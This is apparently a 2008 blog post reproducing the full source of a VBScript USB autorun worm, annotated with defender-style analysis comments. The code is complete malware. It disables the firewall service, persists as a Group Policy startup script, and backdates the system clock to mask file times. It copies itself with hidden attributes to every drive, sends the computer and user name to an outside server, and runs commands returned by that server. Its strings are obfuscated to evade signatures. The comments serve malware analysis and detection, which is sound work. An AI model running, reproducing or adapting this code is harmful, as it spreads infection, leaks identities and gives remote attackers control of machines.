一U盘病毒VBS脚本
Oct 29th, 2008 by song

[code]On error ResUme NeXT
' ANALYSIS NOTES (defender annotations; every statement below is unchanged).
' Main body of a VBScript autorun worm. Obfuscation is random letter case plus strings that are
' reversed and/or URL-escaped and then passed to CreateObject / Execute.
' Observable indicators, all taken from the code in this listing:
'   - <drive>:\autorun.inf and <drive>:\Eva.vbs with attributes 7 (read-only + hidden + system)
'   - <system dir>\prncfg.vbs registered as a machine startup script (two registry keys, see below)
'   - "net stop sharedaccess", repeated "cmd /c date ..." calls, a short-lived SysInfo.reg
'   - HTTP GET carrying the header User-Agent: EvaR
' "On Error Resume Next" above suppresses all runtime errors, so failures are silent.
' StrReverse argument decodes to "Scripting.FileSystemObject".
Set Fso=cREaTeObjEct(STRREVErsE("tCeJbOMetsYSELIf.gnItPIRCs"))
' StrReverse argument decodes to "WScript.Shell".
SET wSHshEll=cReaTEOBJEcT(strREverSE("LlEhs.TPIrCSW"))
dIm drI_lISt,DrI_lisT0
DiM IssEnD
' IsSend: 0 until one HTTP beacon has completed without error.
ISsEnd=0
' Remember today's date so it can be restored after the clock is changed.
c_TIMe=datE()
' Stops the SharedAccess service in a hidden window (style 0); on XP-era Windows this is the
' built-in firewall / connection-sharing service - NOTE(review): confirm for the target OS.
WshshELL.ruN "Net SToP sHaReDaccEsS",0
seT DrvS=fSO.Drives
' GetSpecialFolder(1) is the Windows system folder.
sYsdIr=fSo.GetSpeCIalfoLDeR(1)
' Read this script's own source into Scopy (mode 1 = read); it is the text written out as copies.
thiSPATH=WscRIPt.sCrIPtfuLLNAMe
sEt FC=fSo.OPENTExTFilE(tHiSpaTH,1)
Scopy=Fc.rEAdaLl
fC.CLoSE
SET fC=NotHInG
' Drops <system dir>\SysInfo.reg. The literal is reversed, then URL-unescaped; decoded it is a
' "Windows Registry Editor Version 5.00" file that writes, under both
'   HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\0\0
'   HKLM\Software\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup\0\0
' the values Script="%WinDir%\System32\prncfg.vbs", Parameters="" and ExecTime=hex(b):00,...
' i.e. persistence by registering the dropped copy as a Group Policy startup script.
cAlL wriTEFILe(sYsdIr&"\SYsInfO.reg",UNescapE(sTRReverSE("00C2%00c2%00C2%00C2%00c2%00C2%00c2%00c2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00a3%92%B82%XEHD3%22%EMItCeXe22%a0%D0%02%22%22%D3%22%SrETeMARAp22%a0%d0%02%22%sBv.gfcNrpc5%C5%23meTSYSC5%C5%52%RIdniW52%22%d3%22%tpIrCS22%A0%D0%02%d5%0c5%0c5%puTrAtsc5%STpIRcsc5%ENiHcaMc5%EtATsc5%YcILoP02%puorGc5%noiSrEVTneRRUcc5%sWodNiwc5%tFoSOrcimc5%erAWTFOsC5%enihcam_lACOL_yEKHb5%A0%d0%A0%d0%02%00c2%00c2%00C2%00C2%00C2%00c2%00c2%00c2%00C2%00c2%00c2%00C2%00C2%00C2%00c2%00A3%92%B82%xEhD3%22%EmItCexe22%a0%D0%02%22%22%d3%22%SReteMaRAp22%A0%d0%02%22%SbV.gFcnrpc5%C5%23meTsYSC5%C5%52%riDniW52%22%D3%22%tpirCs22%A0%d0%02%d5%0c5%0C5%puTRAtsC5%StpIRcsc5%meTsysc5%SwODNiWC5%TFOsoRCiMc5%sEICiLOpC5%eraWtfosc5%ENihcAM_LACoL_yeKHB5%a0%D0%A0%d0%03%03%e2%53%02%E6%f6%96%37%27%56%65%02%27%F6%47%96%46%54%02%97%27%47%37%96%76%56%25%02%37%77%F6%46%E6%96%75%")))
' Silent import of the .reg file (/s suppresses the confirmation dialog), then remove the file.
wShSHell.ruN "REGEDiT /s sysinFo.REG",0
wsCRIPt.SLeep 200
fso.dElETEfILe SYSdiR&"\sYsiNFO.REg",true
' Branch on where the script was started from:
'   path contains the system folder -> resident copy (prncfg.vbs): spread and beacon forever
'   anything else                   -> copy started from a drive root: install, then hand over
if iNsTr(thISPATH,SysdIR)>0 thEN
' Baseline list of drive letters that are currently ready.
Dri_LIsT0=LISTDrV()
' Builds an altered date string by decrementing the 4th character of today's date by one.
' NOTE(review): with a year-first date format that is the last digit of the year; the result
' depends on the system locale - confirm.
O_time=Left(C_tIme,3)&cstR(INT(mid(C_Time,4,1))-1)&rIgHt(C_Time,Len(c_timE)-4)
' Sets the system date to that value before writing files, so the dropped files presumably
' carry the altered date; forensic timelines should not trust these timestamps.
wSHShell.run "cmd /C DAte "&o_time,0
WsCrIpt.slEEP 10000
' Write autorun.inf + Eva.vbs to the root of every drive in the baseline list.
foR DRi_i=1 TO leN(drI_lIst0)
CaLL WriTeaUtO(mID(dRI_List0,Dri_I,1)&":\")
NEXT
' Put the system date back to the value saved at start.
wsHSHElL.rUN "Cmd /C DatE "&C_TIMe,0
' Collect computer name and logged-on user through WMI (Win32_ComputerSystem).
comPUterNAme="":uSernaME=""
set OBjwmiservIcE=geToBjECt("winMgmTs:{imPErsONatIONlevel=imPersonaTe}!\\.\roOt\CImV2")
set ColCoMPUTerS = ObJwMIsErvice.ExEcQuery("SEleCt * froM Win32_cOmpuTERsYsTem")
foR eAch oBJCOmputer IN colCOMPUTErs
cOmpUtErnAmE=OBjComPuTEr.nAMe
userNAME=OBJcOMPUtEr.UsERnAMe
nEXt
' Fallback user name "Evar"; a name without a backslash is prefixed with the computer name.
if uSeRnAmE="" tHEn usERname="Evar"
If INstr(uSERnAme,"\")<=0 ThEn
useRnaMe=COMpuTERnAmE&"\"&usernaMe
End iF
' Endless loop: beacon until one request succeeds, and re-scan drives once per second.
Do
if IsseNd=0 then
' StrReverse argument decodes to "Msxml2.ServerXMLHTTP".
seT XmL=CreATEobjEct(stRrEVERse("ptTHLMxreVRES.2LmxSm"))  
' Synchronous GET; the unescaped and reversed URL is (defanged)
'   hxxp://202.119.104[.]100/zzb/eva/count.asp?a=
' with the COMPUTER\user string appended, so host and account names leave the machine.
xmL.OPEN "geT",StRrEVerSe(unESCApE("%3D%61%3F%70%73%61%2E%74%6e%75%6f%63%2f%61%76%65%2f%62%7a%7a%2F%30%30%31%2E%34%30%31%2e%39%31%31%2e%32%30%32%2F%2f%3A%70%74%74%68"))&usErNAMe,0
' Fixed, non-browser User-Agent value - a usable proxy / IDS match string.
Xml.SeTrequesTheaDEr "uSer-AGent","EvaR"
XML.Send()
if ERR.NUMbER=0 thEn
IsSEND=1
res=Xml.REspOnsetExt
' If the response body starts with "execute" (case-insensitive) it is passed to Execute:
' whoever controls that server can run arbitrary VBScript in this process.
IF uCASe(LeFT(REs,7))=uCAse("exECuTe")  then ExecUtE Res
Else
Err.CLEAR
End IF
SeT xmL=nOtHiNG
END If

' Compare the current ready-drive list with the previous one; letters not seen before
' (e.g. a newly attached drive) get autorun.inf + Eva.vbs written to their root.
Dri_LIst=liStdRV()
FoR DRI_k=1 tO lEn(drI_liST)
If INstR(DRI_LiST0,MiD(dRI_list,dRi_K,1))<=0 theN
CAlL wRITEauto(mId(DrI_LIst,dRI_k,1)&":\")
End if
NEXt
DRI_LIST0=drI_lIsT
wSCRiPt.sleeP 1000
lOOp
ELSE
' Opens Explorer on the current directory (window style 3 = maximized), presumably so that
' opening the drive still looks normal to the user.
WShSHeLL.rUn "ExPLorER .\",3
WScRIPt.sleEp 2000
' The %u escapes decode to the Chinese window title for "My Computer"; that window is
' activated and sent Alt+Space followed by C - presumably the system-menu Close command.
WsHshELL.appaCTIVaTe unEsCape(lcaSe("%u6211%u7684%u7535%u8111"))
WsHSHEll.sEndkEys uCaSe("% C")
' Count wscript.exe processes through WMI; this process is one of them, so two or more
' means another script host is already running and this copy exits.
rUnfLAG=0
fOr eACh pS in gETobJECT _
("WinmGmtS:\\.\rOoT\cIMV2:wiN32_pRocEsS").INSTAncES_
if LcasE(PS.nAMe)=LCASe("wSCRIPT.EXe") tHeN
RUNFLAg=runfLAg+1
end IF
NEXt
If RUNfLaG>=2 thEn wsCRipT.QUIT
' Sets the system date to the date part of the system folder's creation timestamp before
' dropping prncfg.vbs, presumably so the file's dates blend in with that folder; restored after.
SEt Sf=FSO.gETFOLdEr(SYSdir)
F_TIMe=leFT(sf.DateCreaTeD,iNstr(sf.DATeCREAteD," ")-1)
WsHSHEll.Run "CmD /C DAtE "&F_tIMe,0
wScRIPT.SLEEp 100
' Write a case-randomized copy of this script (see VS) to <system dir>\prncfg.vbs.
calL wriTEFILe(SySDIR&LcAse("\PRNcFG.vBs"),Vs(SCOPY))
wsHSHell.Run "CMD /c dATE "&C_tImE,0
' Start the resident copy; it takes the first branch of the If above.
wsHshelL.rUN SySDir&"\pRnCFG.VbS"
EnD IF
' VS(str): returns str with the letter case of every character chosen at random.
' The body is hidden in an escaped, reversed string run through Execute. Decoded, it loops over
' str, upper-cases each character, calls Randomize, and when Int(Rnd()*100) > 50 appends the
' lower-cased character, otherwise the upper-cased one; finally it replaces "%U" with "%u"
' (presumably so the %uXXXX escapes in the script still decode in the copy).
' Detection consequence: every dropped copy has different bytes, so file hashes and
' case-sensitive string signatures do not carry over between copies; match case-insensitively.
functiOn VS(str)
ExeCutE strReVErse(uNescAPE("%29%29%22u%25%22%28ESAcl%2c%29%22u%25%22%28eSacU%2CsV%28eCALPeR%3DsV%0D%0AtxEN%0d%0AFI%20dNE%0D%0Ac%26sV%3dSV%0d%0aeSlE%0D%0A%29c%28EsacL%26sv%3Dsv%0d%0AnEHT%2005%3e%29001*%29%28dNr%28tnI%20fI%0D%0AEZIMoDnAR%0d%0a%29%291%2ci%2CRts%28DIm%28eSAcu%3dC%0d%0A%29RTs%28Nel%20OT%201%3Di%20roF"))
eND FUNCTiOn
' ListDrv(): returns a string holding the drive letter of every drive that reports IsReady.
' Decoded, the Execute'd text iterates the script-level DrvS collection (fso.Drives) and
' concatenates Drv.DriveLetter for each ready drive. There is no check of the drive type, so
' fixed disks are included as well as removable media.
FuNcTioN LISTdRV()
EXEcUTe STrreVERSE(UNeSCAPE("TsiL_pMT%3DVRDtsil%0d%0ATXEN%0d%0AFI%20DNe%0d%0AretteLEViRD.vrD%26tsIl_Pmt%3DTsIL_PmT%0d%0anEhT%20YdAERSI.VrD%20fi%0d%0aSVRd%20Ni%20vRd%20hcaE%20rof%0D%0a%22%22%3dTSIL_pMT%0D%0aTSIL_pmt%20MID"))
END FUnCtiON

' WriteAuto(PATH): plants the autorun pair in the drive root PATH (e.g. "E:\").
' Decoded, the Execute'd text handles an existing autorun.inf first: a FOLDER of that name is
' moved to PATH & Rnd() (this defeats the common "create an autorun.inf folder" immunization),
' and a FILE of that name is force-deleted.
' It then writes an autorun.inf whose [AutoRun] section has an empty OPEN= line and
' shell\OPEN\command, shell\EXPLORE\command and shell\FIND\command all set to
' wscript.exe "EVA.Vbs", followed by a case-randomized copy of the script as Eva.vbs.
' Both files are written through WriteFile, which sets attributes 7.
suB WRITeAUtO(PATH)
exECute STRREVErSE(UNEsCapE("FI%20DNE%0d%0AeUrT%2C%22fni.NUrotUA%22%26Htap%20ELiFETelEd.Osf%0d%0aneHT%20%29%22fnI.nUrOTUA%22%26HtAp%28StsixeeLiF.Osf%20fIEslE%0D%0a%29%28dnr%26htAP%2C%22fNI.NurOTuA%22%26HTap%20rEDLOfevOM.OSF%0d%0aNEhT%20%29%22FnI.nUrOTUA%22%26Htap%28STSIXeREDLOF.Osf%20FI"))
' "*" is a placeholder that the Replace calls below swap for the shell verb name.
Cmdstr="ShELL\*\commAND=wsCrIpT.eXe "&CHR(34)&"EVA.Vbs"&cHR(34)
AuTOSTR="[AUtorUn]"&VBcrLF&"OPeN="&vbcrLF&REPlace(CMdstr,"*","OPeN")&vBCrLf&rePlACe(cmDsTr,"*","EXplorE")&VbcrlF&RePLacE(cMDsTr,"*","fInD")
cALL WriTEFIle(PATh&uCASE("aUTorUN.iNf"),aUToSTR)
CalL WrITEFiLE(Path&"Eva.VbS",vs(sCOPY))
eNd SUB

' WriteFile(FPATH, CONtenT): replaces the file at FPATH with CONtenT and hides it.
' Decoded, the Execute'd text force-deletes FPATH if it exists, opens it for writing
' (OpenTextFile mode 2, create = True), writes CONtenT, closes the file, then sets
' Attributes = 7 (read-only + hidden + system). Files dropped through this routine are
' therefore not shown by Explorer's default view; a listing that includes hidden and
' system files is needed to see them.
SUb WriTEFiLe(FPATH,CONtenT)
EXEcuTE sTRrEVeRse(uNESCAPe("gNIHton%3daF%20TeS%0D%0A7%3dseTuBIrTta.aF%0D%0A%29htapF%28EliftEg.oSF%3Daf%20Tes%0D%0aGnIhToN%3DCF%20TES%0d%0AEsolC.CF%0d%0atNETnOc%20eTIrW.CF%0D%0A%29EURT%2C2%2chtAPf%28eLiFtxEtNEPO.OSF%3dCF%20Tes%0d%0aeURT%2cHTAPF%20ELifeTeLeD.Osf%20nEHt%20%29htAPF%28stsiXEElif.osf%20FI"))
eND Sub
[/code]
